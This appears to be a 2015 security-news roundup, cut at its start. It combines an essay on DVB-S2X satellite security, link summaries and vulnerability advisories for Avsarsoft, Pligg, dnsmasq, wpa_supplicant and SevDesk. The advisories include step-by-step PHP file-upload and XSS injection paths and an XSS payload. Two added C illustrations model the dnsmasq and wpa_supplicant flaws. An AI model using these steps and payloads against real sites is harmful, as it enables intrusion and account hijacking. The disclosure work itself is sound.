(DVB-S2X), multiple security predicaments were observed.

Review of DVB-S2X
================
The DVB-S2X is the extended version of DVB-S2 which was officially
presented by the DVB Consortium in 2014.

The new standard provides a number of technical enhancements in
support of DVB-S2X ecosystems, such as improved and faster
modulation for the delivery of UHD services; however, during our
security evaluation we found that no security considerations are made.

It is pertinent to note that both the older DVB-S2 and the current
DVB-S2X (Extended) support fully-fledged Internet Protocol
interoperation.

DVB-S2X offers very low carrier-to-noise and carrier-to-interference
ratios, below -10 dB (SNR), which makes it suitable for professional
and even military deployments.

The following enhancements are made:
• Low roll off and smaller carrier spacing.
• Advanced Filtering technologies for bandwidth.
• Forward Error Correction Enhancements with added support for (64,
128, 256APSK) for professional and military applications, for extended
requirements, improved spectral efficiency and increased granularity.
• Bonding mechanisms for streams of TV data.
• Improvements for Optimal Modulation (MODCOD).
• A very low SNR MODCOD to support mobile architectures from land, sea
and air. Additional modulation enhancements have been provided in the
QPSK and BPSK range, in order to enhance atmospheric interference
protection mechanisms.
• The VLSNR MODCOD packet header was modified with the inclusion of a
PLH (Physical Layer header) and the addition of a significantly better
error correction coding system.
• Wideband Support for improved signal propagation.

During our evaluation it was established that the current composition
of DVB-S2X fails significantly to adhere to best practice and security
fundamentals. There are no security controls for the provision of the
fundamental security services of Confidentiality, Integrity and
Availability (nor Non-Repudiation and Data Origin Authentication).
Although a two-way scrambling method is included, scrambling cannot
substitute for encryption.

This security issue stems from the lack of encryption of plain-text
information as it is received from an L2 source, throughout the
encapsulation of information. Current implementations use standard
Internet security protocols to bridge the gap.

The lightweight architecture of protocols such as MPEG-2/MPEG-4 can be
susceptible to overhead and service degradation.

This affects DVB-S2 and S2X compatible ecosystems that transmit
information using MPEG-2 TS over IP or MPEG-4 TS over IP, which makes
them susceptible to eavesdropping attacks.

DVB-S2 and DVB-S2X support fully-fledged IP interoperation. Therefore
the current composition of DVB-S2X fails to address the inherent
security issues at the core of the problem while the standard is still
in its embryonic stages.


Security considerations should be made using a rigorous, layered
approach to security.

Current designs of HEVC modulation (in DVB/S2X) lack fundamental
security services such as those of Confidentiality, Integrity,
Availability and Non-Repudiation.

It is pertinent to note that the DVB-S2X support for backward
compatibility with MPEG-2 over IP can be abused by threat actors.

Technological and market transformation from DVB/S2 to DVB-S2x is a
lengthy process for manufacturers and satellite service providers
alike.

The importance of confidentiality is paramount for the protection and
prevention of unauthorized access to private information.

A malicious attacker could take advantage of this lack of security
services to passively wiretap bits of plain-text information. HEVC
fuzzing techniques can be used for the extraction of information that
may be contained in HEVC bit-stream structures and access units.


Attacks against 4K ecosystems
============================

Man-in the middle attacks

Repudiation Attacks

Denial of Service attacks against the actual satellite ecosystem
(while in orbit)

Replaying & Reordering attacks


MPEG-2 and H.264/MPEG-4 vulnerabilities
===================================

In an MPEG-2 TS transmission, the network identifies the "TS logical
channel" and the PDUs received.

For instance, a Transport Stream contains multiplexed data from
multiple packet sources, carrying the payload of a number of PES data
streams.

This lack of integrity and data origin authentication in the
encapsulated MPEG-2 Transport Stream packets over DVB-S2X can be
problematic.

Attacks that seek to fabricate, falsify, alter or delete information
are feasible due to the lightweight protocol characteristics.

Whilst current methodologies suggest that encryption can be provided
using standard Internet Security Protocols such as IPSEC, this only
bridges the gaps.

Another security problem arising from the lack of confidentiality and
integrity is that the plain-text streams contain the hardware MAC or NPA
addresses of the participating L2 destination.


Conclusion
============
While Internet Protocol Security (IPsec) provides advantages for
MPEG-2 over IP in satellite infrastructures, such as interoperability,
it also presents a trade-off in Quality of Service.

Satellite security for 4K broadcasting is reliant on standard
security protocols to address inherent security issues.
For example, an IPsec security gateway in tunnel mode would
reveal disadvantages in terms of network overhead and QoS.

ML-IPSEC
==========
ML-IPsec attempts to address the problems arising from the use of
IPsec, although the issue of mobility remains, which creates a
plethora of other issues for service providers and users alike.


SSL Vulnerabilities
================
Ecosystems that make use of SSL are prone to a variety of attacks.
In light of recent issues, FREAK (SSL/TLS), BEAST, Heartbleed and DoS
attacks (NULL pointer dereference / memory exhaustion) are some of the
vulnerabilities affecting SSL implementations.


References
============
US CERT, (2015). FREAK-SSL Vulnerability. [online] Available at:
https://www.us-cert.gov/ncas/current.../FREAK-SSLTLS-Vulnerability
[Accessed 23 Apr. 2015].

DVB Consortium, (2015). DVB-S2X. [online] Available at:
http://www.dvb.org/resources/public/standards/a83-2_dvb-s2x_den302307-2.pdf
[Accessed 23 Apr. 2015].

Securityfocus Website, (2015). OpenSSL Advisory. [online] Available
at: http://www.securityfocus.com/archive/1/535167 [Accessed 23 Apr.
2015].

Us-cert.gov, (2015). OpenSSL 'Heartbleed' vulnerability
(CVE-2014-0160) | US-CERT. [online] Available at:
https://www.us-cert.gov/ncas/alerts/TA14-098A [Accessed 23 Apr. 2015].

IRC Botnets alive, effective & evolving

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel. It usually involves a Botnet operator controlling the IRC bots through a previously configured IRC server & channel. The Botnet operator, after appropriate checks, periodically moves the IRC bot to a new IRC channel to thwart researchers & automated sandboxes from monitoring the commands.

In this blog, we will look at one of the most prevalent IRC based malware families - DorkBot, followed by three additional IRC Botnet families - RageBot, Phorpiex, and IRCBot.HI.

more here........http://research.zscaler.com/2015/04/irc-botnets-alive-effective-evolving.html

Crash Triage with SemTrax (CVE-2014-2525)

In this post we’ll look at how SemTrax can be used to help quickly identify the root cause of a crash. Successful fuzzers tend to make triage and prioritisation the most costly part of bug finding, and this is one of the use-cases we’ve focused on when designing SemTrax.

more here......http://www.getsemtrax.com/2015/04/23/crash-triage-with-semtrax-cve-2014-2525.html

Avsarsoft Matbaa Script - Multiple Vulnerabilities

#Title  : Avsarsoft Matbaa Script - Multiple Vulnerabilities
#Author  : ZoRLu / zorlu () milw00rm com
#Website : milw00rm.com / milw00rm.net / milw00rm.org
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test  : Windows7 Ultimate
#Discovery : 15/04/15
#Publish    : 23/04/15
#Thks  : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net, cxsecurity.com and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx
#Demo       : http://avsarsoft.com/matbaa/
#Demo User  : sop08574 () qisdo com
#Demo Pass  : 123456

1) Remote File Upload Vulnerability

you go here:

localhost/path/index.php?Git=KartvizitTasarla

localhost/path/index.php?Git=BrosurTasarla

localhost/path/index.php?Git=DavetiyeTasarla

after click to "Resim Ekle"

select your php file and wait for upload

after go here for you php file

localhost/path/upload/file.php

2) Multiple XSS Vulnerabilities

register to site 

localhost/path/index.php?Git=UyeOl

after login

localhost/path/index.php?Git=Uyelik

after go here and add your xss code

localhost/path/index.php?Git=KontrolPaneli&Sayfa=KisiselBilgilerim

localhost/path/index.php?Git=KontrolPaneli&Sayfa=AdresBilgilerim

localhost/path/index.php?Git=KontrolPaneli&Sayfa=Yorumlar

Pligg CMS 2.0.2 - Stored XSS

#Affected Vendor: http://pligg.com/
#Date: 23/04/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: Persistent XSS
#Tested on: Windows 8.1
#Product: Pligg CMS
#Version: 2.0.2
#Tested Link: http://localhost/pligg/admin/admin_page.php 

Description: Pligg CMS is a content management platform that powers tens of thousands of websites. It specializes in 
creating social publishing networks, where users submit and promote content similar to sites like Digg, Reddit, and 
Mixx. Pligg CMS is vulnerable to a stored XSS vulnerability. The parameters "page_title" and "page_content" are the 
vulnerable parameters which will lead to its compromise.

#Proof of Concept (PoC): "><img src="a.jpg" onerror="alert('XSS')"/>

TLS/SSL Security In PHP: Avoiding The Lowest Common Insecure Denominator Trap

A few weeks back I wrote a piece about updating PHARs in-situ, what we’ve taken to calling “self-updating”. In that article, I touched on making Transport Layer Security (TLS, formerly SSL) enforcement one of the central objectives of a self-updating process.

more here........http://blog.astrumfutura.com/2015/04/tlsssl-security-in-php-avoiding-the-lowest-common-insecure-denominator-trap/

Qt Creator 3.4.0 released

Qt Creator, the open source multi-platform IDE, has a new release; the changelog is here.....https://blog.qt.io/blog/2015/04/23/qt-creator-3-4-0-released/

DYREZA’S ANTICRYPT

In the previous post, we have described how to set up a loft to monitor Dyreza with the help of virtual machines configured with breakpoints at addresses where communications appear in clear text. Configuration file updates can thus be obtained in real-time easily. Another way to monitor this kind of malware using a decentralised architecture is to implement parts of the malicious binary in a thin client, which requires to fully understand its decryption routine details.
more here......http://www.lexsi-leblog.com/cert-en/dyrezas-anticrypt.html

pgcli

Pgcli is a command line interface for Postgres with auto-completion and syntax highlighting

more here......http://pgcli.com/index


User-defined Storage-based Covert Communication

One of my favorite Cobalt Strike technologies is Malleable C2. This is a domain specific language for user-defined storage-based covert communication. That’s just a fancy way of saying that you, the operator, have control over what Cobalt Strike’s Beacon looks like when it communicates with you.

more here.......http://blog.cobaltstrike.com/2015/04/23/user-defined-storage-based-covert-communication/

Paper: Breaking the Rabin-Williams digital signature system implementation in the Crypto++ library

This paper describes a bug in the implementation of the RabinWilliams
digital signature in the Crypto++ framework. The bug is in
the misuse of blinding technique that is aimed at preventing timing
attacks on the digital signature system implementation, but eventually
results in an opportunity to find the private key having only two
different signatures of the same message. The CVE identifier of the
issue is CVE-2015-2141.


Some Recent RSA 2015 Conference Uploaded Video's

Quantitative Security: Using Moneyball Techniques to Defend Corporate Networks -
In “Moneyball,” Michael Lewis describes how a sports team used data analytics to field the best possible players. Can this quantitative approach help a company achieve the highest possible level of security? Amit Mital will discuss how advanced data mining on massive amounts of security intelligence will help organizations thwart even the most complex attacks on their systems and information. more here...........http://www.rsaconference.com/media/quantitative-security-using-moneyball-techniques-to-defend-corporate-networks


Talking ’bout My Next Generation
Who would’ve thought a 50-year-old song would’ve been the perfect descriptor for how cyber security practitioners sometimes feel viewed by the rest of the world? In the immortal words of The Who, “People try to put us down.” Come hear about what’s next for cyber security. The answer might surprise you and “cause a big sensation.” more here......http://www.rsaconference.com/media/talking-bout-my-next-generation


Welcome to the New School of Cyber Defense
The old school of cyber defense emphasized securing infrastructure and restricting data flows. But data needs to run freely to power our organizations. The new school of cyber defense calls for security that is agile and intelligent. It emphasizes protecting the interactions between our users, our applications and our data. The world has changed, and we must change the way we secure it. more here....http://www.rsaconference.com/media/welcome-to-the-new-school-of-cyber-defense


Pass-the-Hash II
Abbreviated version of Pass-the-Hash II: The Wrath of Hardware with Nathan Ide, Principal Development Lead, Microsoft. more here.........https://www.youtube.com/watch?v=K21J5X4HO04


New Threat Report Via F-Secure

The security firm's comprehensive threat report, based on its analysis of H2 2014 data, is now available here......https://www.f-secure.com/documents/996508/1030743/Threat_Report_H2_2014


H2 2014 Threat Report At A Glance

Lack of Android Updates Come Under FTC Scrutiny?

Last week, a rather interesting complaint was filed before the Federal Trade Commission. In a 16-page complaint, the American Civil Liberties Union described the lack of updates for many Android devices as “unfair and deceptive business practices”. The complaint went on to ask the respondents (the top four wireless carriers in the United States) to let customers with unpatched (and vulnerable) devices out of their contracts early.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/lack-of-android-updates-to-come-under-ftc-scrutiny/

Dnsmasq 2.72 Unchecked returned value

Dnsmasq provides network infrastructure for small networks: DNS, DHCP, router advertisement and network boot. (Source: http://www.thekelleys.org.uk/dnsmasq/doc.html)

"Dnsmasq 2.72 Unchecked returned value"

Description
------------------------------------------------------------
Dnsmasq does not properly check the return value of the setup_reply()
function called during a TCP connection (by the tcp_request() function).
This return value is then used as a size argument in a function which writes
data on the client's connection. This may lead, upon successful
exploitation, to reading the heap memory of dnsmasq.
 
In more detail:
Function tcp_request() calls setup_reply() and the returned value is used as
a size argument in a write function.
 
m = setup_reply(header, (unsigned int)size, addrp, flags,
                daemon->local_ttl);
read_write(confd, packet, m + sizeof(u16), 0);
 
The m variable is determined by a subtraction between the return value
of skip_questions() and the header pointer. The return value of
skip_questions() is not checked for error (NULL). As a result, the
negative value of the pointer (-header) might be returned.
 
size_t setup_reply(struct dns_header *header, size_t qlen,
                   struct all_addr *addrp, unsigned int flags, unsigned long ttl)
{
       /* skip_questions() returns NULL on a malformed question section */
       unsigned char *p = skip_questions(header, qlen);
       return p - (unsigned char *)header;   /* NULL - header: huge size_t */
}
 
read_write checks if the size argument is positive. On a 32-bit system
size_t m would be 4 bytes and read_write will automatically exit. On a
64-bit system size_t m is 8 bytes and may turn positive if the sign bit
of the 32-bit value is 0.
 
If m is less than 0xffffffff80000000, dnsmasq can be exploited by a
potential attacker who can remotely read the dnsmasq heap. If the above
condition is not met, dnsmasq exits properly.
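The unchecked subtraction described above, as an added example that is not dnsmasq's own code: a constructed stand-in for skip_questions(), the 2.72-style setup_reply() beside a hardened variant that fails closed, and a model of the sign test on a narrowed int, run over two constructed DNS queries. The header layout, the packet bytes and the int-narrowing model of read_write()'s size check are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed stand-in for dnsmasq's DNS header: 12 bytes, QDCOUNT in bytes 4-5. */
struct dns_header {
    uint8_t raw[12];
};

/* Constructed stand-in for skip_questions(): walks QDCOUNT question records
 * (length-prefixed labels ending in a 0 byte, then 4 bytes QTYPE/QCLASS) and
 * returns a pointer past them, or NULL when the packet is truncated/malformed. */
static unsigned char *skip_questions(struct dns_header *header, size_t qlen)
{
    unsigned char *p = (unsigned char *)header + sizeof(*header);
    unsigned char *end = (unsigned char *)header + qlen;
    unsigned int qdcount;

    if (qlen < sizeof(*header))
        return NULL;
    qdcount = ((unsigned int)header->raw[4] << 8) | header->raw[5];
    while (qdcount-- > 0) {
        for (;;) {                          /* QNAME labels */
            if (p >= end)
                return NULL;
            unsigned int label = *p++;
            if (label == 0)
                break;
            if (label > 63 || (size_t)(end - p) < label)
                return NULL;                /* label runs past the packet */
            p += label;
        }
        if ((size_t)(end - p) < 4)          /* QTYPE + QCLASS */
            return NULL;
        p += 4;
    }
    return p;
}

/* Mirrors the 2.72 behaviour described above: the NULL result is not checked,
 * so the subtraction yields (size_t)(0 - header), a huge value. The arithmetic
 * is done on uintptr_t to reproduce the number without NULL-pointer UB. */
size_t setup_reply_unchecked(struct dns_header *header, size_t qlen)
{
    unsigned char *p = skip_questions(header, qlen);
    return (size_t)((uintptr_t)p - (uintptr_t)header);
}

/* Hardened variant: fail closed with 0 when the question section is malformed. */
size_t setup_reply_checked(struct dns_header *header, size_t qlen)
{
    unsigned char *p = skip_questions(header, qlen);
    if (!p)
        return 0;
    return (size_t)(p - (unsigned char *)header);
}

/* Constructed model of the sign test the advisory attributes to read_write():
 * the 64-bit length is narrowed to int before the "> 0" test, so a huge
 * size_t whose low 32 bits have the sign bit clear still passes. */
int legacy_size_check_passes(size_t m)
{
    int size = (int)(m + sizeof(uint16_t));
    return size > 0;
}

/* What the caller should require instead: a non-zero length that fits the
 * reply buffer (constructed helper, not dnsmasq's own code). */
int reply_is_sendable(size_t m, size_t bufsize)
{
    return m != 0 && m + sizeof(uint16_t) <= bufsize;
}

/* Constructed packets: a well-formed A query for www.example.com, and one whose
 * last label claims 7 bytes while only 2 are present. */
static unsigned char GOOD_QUERY[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,   /* header, QDCOUNT=1 */
    3, 'w', 'w', 'w', 7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01                                   /* QTYPE A, QCLASS IN */
};
static unsigned char BAD_QUERY[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,
    3, 'w', 'w', 'w', 7, 'e', 'x'
};

/* Wrappers so each packet can be run through either variant by name. */
size_t good_query_len_checked(void)
{
    return setup_reply_checked((struct dns_header *)GOOD_QUERY, sizeof(GOOD_QUERY));
}
size_t bad_query_len_checked(void)
{
    return setup_reply_checked((struct dns_header *)BAD_QUERY, sizeof(BAD_QUERY));
}
size_t bad_query_len_unchecked(void)
{
    return setup_reply_unchecked((struct dns_header *)BAD_QUERY, sizeof(BAD_QUERY));
}
size_t bad_query_size(void)
{
    return sizeof(BAD_QUERY);
}
```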

Researcher
------------------------------------------------------------
Nick Sampanis (n.sampanis[a t]obrela[do t]com)


Vulnerability
------------------------------------------------------------
Unchecked return value CVE-2015-3294

Identification date:
------------------------------------------------------------
07/04/2015 - 09/04/2015

Solution - fix & patch
------------------------------------------------------------
Please download dnsmasq-2.73rc4.tar.gz

Reference:
------------------------------------------------------------
http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2015q2/009382.html
https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1502/

Android wpa_supplicant WLAN Direct remote buffer overflow

1. Advisory Information
Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
Date published: 2015-04-23
Date of last update: 2015-04-23

2. Vulnerability Information
Class: heap overflow
Impact: memory information leak and remote code execution
Remote Exploitable: Yes
Local Exploitable: No
CVE Name: CVE-2015-1863
Vulnerability Information and Patch: http://w1.fi/security/2015-1/

3. Vulnerability Description
  In Android, wpa_supplicant is designed to be a "daemon" program that runs in the background and acts as the backend 
component controlling the wireless connection. When the WLAN Direct function of wpa_supplicant is enabled, a malformed p2p 
invitation type packet with a long ssid can trigger a heap overflow vulnerability. An attacker could launch a remote 
attack within the wireless device's signal coverage, access the victim's Android device and execute native code with the 
corresponding user privileges (in Android this is the wifi user). That user has permission to read the saved WIFI password, 
change the network configuration and hijack all Wi-Fi traffic. When combined with a local privilege escalation 
vulnerability, this allows an attacker to remotely control a host of victims, implant Trojans and other underlying 
implant systems.
4. Vulnerable Packages
 Android 4/Android 5
 wpa_supplicant 2.x
5. Credits
Smart hardware research group of Alibaba security team for discovering the vulnerability.
6. Technical Description
 wpa_supplicant mallocs a p2p_device structure, whose oper_ssid field is 0x20 bytes. In the p2p invitation 
packet the size of the ssid field is described by an octet, the maximum of which is 0xff. When copying to the oper_ssid field, the 
length is not checked. When the size of the ssid exceeds 0x20 bytes, it can overflow other fields of the p2p_device 
structure, and when it exceeds 0x40 bytes it overflows the heap structure.
    In Android version 5.1, the source is:
============ p2p_device structure( wpa_supplicant/p2p/p2p_i.h)============
struct p2p_device {
    [……….]
    int oper_freq;
    u8 oper_ssid[32];  <----- fixed 0x20 bytes 
    size_t oper_ssid_len;
       [……….]
    /**
    * go_neg_conf - GO Negotiation Confirmation frame
    */
    struct wpabuf *go_neg_conf;
    int sd_pending_bcast_queries;
};
=========(wpa_supplicant/p2p/p2p.c p2p_add_device ==============
int p2p_add_device(struct p2p_data *p2p, const u8 *addr, int freq,
          struct os_reltime *rx_time, int level, const u8 *ies,
          size_t ies_len, int scan_res)
{
    [……….]
    if (os_memcmp(addr, p2p_dev_addr, ETH_ALEN) != 0)
       os_memcpy(dev->interface_addr, addr, ETH_ALEN);
    if (msg.ssid &&
        (msg.ssid[1] != P2P_WILDCARD_SSID_LEN ||
         os_memcmp(msg.ssid + 2, P2P_WILDCARD_SSID, P2P_WILDCARD_SSID_LEN)
         != 0)) {
        os_memcpy(dev->oper_ssid, msg.ssid + 2, msg.ssid[1]);
//the dest buf is 0x20, but the size is controlled by user input, trigger buffer overflow 
       dev->oper_ssid_len = msg.ssid[1];
    }
[……….]
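The missing length check in the excerpt above, as an added illustration that is not wpa_supplicant's own code: a constructed stand-in for the relevant p2p_device fields and a copy routine that validates the user-controlled SSID length against the 32-byte destination before copying, exercised with constructed SSID elements. The struct layout, the wildcard-SSID handling and the assumption that the upstream fix bounds the length by sizeof(oper_ssid) are mine, not taken from the advisory.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define P2P_WILDCARD_SSID     "DIRECT-"
#define P2P_WILDCARD_SSID_LEN 7

/* Constructed model of the fields of wpa_supplicant's struct p2p_device that
 * matter here; the real struct has many more members. */
struct p2p_device_model {
    int oper_freq;
    uint8_t oper_ssid[32];      /* fixed 0x20 bytes, as in the excerpt above */
    size_t oper_ssid_len;
    void *go_neg_conf;          /* a neighbour an oversized copy would clobber */
};

/* Copies the SSID element of a parsed P2P message into dev. `ssid` points at
 * the element: ssid[0] element id, ssid[1] length, ssid[2..] body; `avail` is
 * how many bytes of the frame remain from ssid. Returns false if rejected.
 * (Constructed illustration of the check; not wpa_supplicant's own code.) */
bool p2p_copy_oper_ssid(struct p2p_device_model *dev,
                        const uint8_t *ssid, size_t avail)
{
    if (!ssid || avail < 2)
        return false;
    size_t len = ssid[1];
    if (len + 2 > avail)
        return false;               /* element claims more than the frame holds */
    if (len > sizeof(dev->oper_ssid))
        return false;               /* the missing bound: a user-controlled length
                                       must never exceed the 32-byte destination */
    if (len == P2P_WILDCARD_SSID_LEN &&
        memcmp(ssid + 2, P2P_WILDCARD_SSID, P2P_WILDCARD_SSID_LEN) == 0)
        return true;                /* wildcard SSID: oper_ssid left unchanged */
    memcpy(dev->oper_ssid, ssid + 2, len);
    dev->oper_ssid_len = len;
    return true;
}

/* Builds a constructed SSID element of n 'A' bytes into out (n + 2 bytes). */
size_t build_ssid_ie(uint8_t *out, size_t n)
{
    out[0] = 0;                     /* SSID element id */
    out[1] = (uint8_t)n;
    memset(out + 2, 'A', n);
    return n + 2;
}

/* Runs an n-byte constructed SSID against a fresh device. Returns 1 if the
 * element was accepted, 0 if rejected, and -1 if the neighbouring field was
 * corrupted (which the check above must never allow). n must be <= 255. */
int try_ssid_len(size_t n)
{
    uint8_t ie[2 + 255];
    struct p2p_device_model dev;
    void *sentinel = (void *)&dev;

    memset(&dev, 0, sizeof(dev));
    dev.go_neg_conf = sentinel;
    size_t avail = build_ssid_ie(ie, n);
    bool ok = p2p_copy_oper_ssid(&dev, ie, avail);
    if (dev.go_neg_conf != sentinel)
        return -1;
    if (ok && dev.oper_ssid_len != n)
        return -1;
    return ok ? 1 : 0;
}

/* The wildcard "DIRECT-" case: accepted, but oper_ssid_len stays 0. */
int wildcard_leaves_ssid_unset(void)
{
    const uint8_t ie[] = { 0, 7, 'D', 'I', 'R', 'E', 'C', 'T', '-' };
    struct p2p_device_model dev;
    memset(&dev, 0, sizeof(dev));
    return p2p_copy_oper_ssid(&dev, ie, sizeof(ie)) && dev.oper_ssid_len == 0;
}
```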
7. Vulnerability Impact Assessment:
    1) Affected product: all devices with Android versions below 5.1.
    2) Default configuration exploitability analysis: although many Android devices only enable WLAN Direct when the user 
enters the WLAN Direct UI, we found that some models from well-known mobile phone manufacturers (such as Xiaomi, Huawei) 
enable WLAN Direct by default. Even if the user never entered the WLAN Direct UI, the attacker can initiate a WLAN Direct 
connection and trigger this vulnerability without user interaction. However, an attacker needs to know the WLAN Direct MAC 
address; this address is the MAC address of the user's equipment with the first byte ORed with 2. The MAC address of the 
user's equipment can easily be acquired with a WIFI packet sniffer, so the WLAN Direct MAC address can be calculated: for 
example, if the user device MAC address is 14:12:34:56:78:90, then the WLAN Direct MAC address is 16:12:34:56:78:90. This 
means that some models of mobile phone can suffer from this attack simply by having the WIFI service switched on.
    Other models without WLAN Direct enabled by default also need attention, because a lot of file transfer software uses 
the WLAN Direct feature and will enable it. Once enabled, even if the user exits the WLAN Direct UI, the feature stays 
enabled until the device reboots or WIFI restarts. During this time the device is affected and can be attacked remotely.
    3) Impact
    This vulnerability can leak information, and the leaked information can be used with ROP to bypass ASLR and DEP. By 
exploiting this vulnerability successfully, attackers can execute native code with wifi user permissions, and with those 
permissions can change the wifi configuration and hijack network traffic.
    This vulnerability can be exploited remotely; combined with a local privilege escalation vulnerability, attackers can 
implant a trojan without physically touching the victim's device.
    So this vulnerability is high risk, especially for devices with WLAN Direct enabled by default.
8. Poc and Coredump 
    See Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
9. Report Timeline
 2015-4-3: sent vulnerability report to the Android security team
 2015-4-8: Android security team acknowledges the vulnerability and forwards it to the wpa_supplicant maintainer
 2015-4-8: wpa_supplicant maintainer acknowledges
 2015-4-13: wpa_supplicant maintainer acknowledges the timeline for releasing a fix
 2015-4-22: wpa_supplicant maintainer publishes the fix and security advisory
 2015-4-23: this advisory is published

Visualizing a single null-byte heap overflow exploitation

When Phantasmal Phantasmagoria wrote The Malloc Malleficarum back in 2005 he exposed several ways of gaining control of an exploitation through corruption of the internal state of the libc memory allocator. Ten years later people are still exploring the possibilities offered by such complex data structures. In this article I will present how I solved a challenge from Plaid CTF 2015 and the tool I wrote in the process.

Phantasmal's paper addressed the patches by libc developers that countered previous exploitation techniques. Some of the insights he presented are still relevant and people continue to go further, but new techniques have emerged. Project Zero gave a good example of this with The Poisoned NUL Byte, which they presented in 2014.

Quick fuzzing of the target reveals some memory errors

more here........http://wapiflapi.github.io/2015/04/22/single-null-byte-heap-overflow/

Ubuntu local privilege escalation

Ubuntu local privilege escalation reported by Tavis Ormandy, which is still not patched (includes PoC), here......http://www.openwall.com/lists/oss-security/2015/04/22/12

SevDesk v1.1 iOS - Persistent Dashboard Vulnerability

Document Title:
===============
SevDesk v1.1 iOS - Persistent Dashboard Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1311


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1311


Common Vulnerability Scoring System:
====================================
4.2


Product & Service Introduction:
===============================
Official app for mobile use of sevDesk. A product of SEVENIT GmbH. 

Daily Backup
256bit SSL encryption
TÜV certified data center

Free version
No hidden costs
No minimum contract term

iPhone App
Runs in any browser
No installation required on the PC

Easy to use
Reduced to the essentials
Automated, where it is only possible

(Copy of the Vendor Homepage: https://sevdesk.de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk mobile application (api).


Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SevenIT
Product: SevDesk - iOS Mobile Web Application (API) 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official SEVENIT Software GmbH sevDesk v1.1 iOS mobile web-application (api).
The vulnerability allows remote attackers or low privileged user accounts to inject their own malicious script code into the application-side of the vulnerable 
web-application module or service.

The security vulnerability is located in the `firstname` values of the main sevDesk `Dashboard` application module & api. Remote attackers are able to inject 
their own script code into the mobile dashboard through the api by manipulating the registration information in the client.

The execution of the script code occurs after the injection on the application-side in the main mobile dashboard status list. If the test user account applies 
any changes to the account profile, the activity becomes visible. The context where the information and details become visible is the location where the 
execution of the persistent injected script code takes place. The attack vector is persistent and the request method to inject the code is POST. 

The security risk of the persistent script code inject web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2. 
Exploitation of the persistent input validation web vulnerability requires a low privileged sevdesk user account with restricted access and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources and persistent 
manipulation of affected or connected application modules (api).

Request Method(s):
    [+] POST

Vulnerable Application(s):
    [+] sevDesk v1.1 iOS

Vulnerable Module(s):
    [+] Registration to SevDesk

Vulnerable Parameter(s):
    [+] firstname (display name)

Affected Module(s):
    [+] Dashboard Index Status List


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1. Install the application on your iOS device (iPad, iPhone)
2. Register a new account 
3. Include your own malicious script code payload as the name value
4. Save the settings and open the Dashboard status listing
Note: After the save, the context gets displayed by the mobile app api through the web database
5. The script code execution occurs in the main status messages
6. Successful reproduction of the security vulnerability in the mobile iOS application!


Picture(s):
   ../1.png
   ../2.png
   ../3.png


Solution - Fix & Patch:
=======================
The issue can be patched by securely parsing and encoding the user credentials on registration through the mobile application api.
Restrict the user input on registration and also parse the status listing in the main dashboard which becomes visible after the malicious changes.


Security Risk:
==============
The security risk of the persistent mobile web vulnerability in the api is estimated as medium. (CVSS 4.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com    - www.vuln-lab.com            - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com  - research@vulnerability-lab.com           - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php          - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php     - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
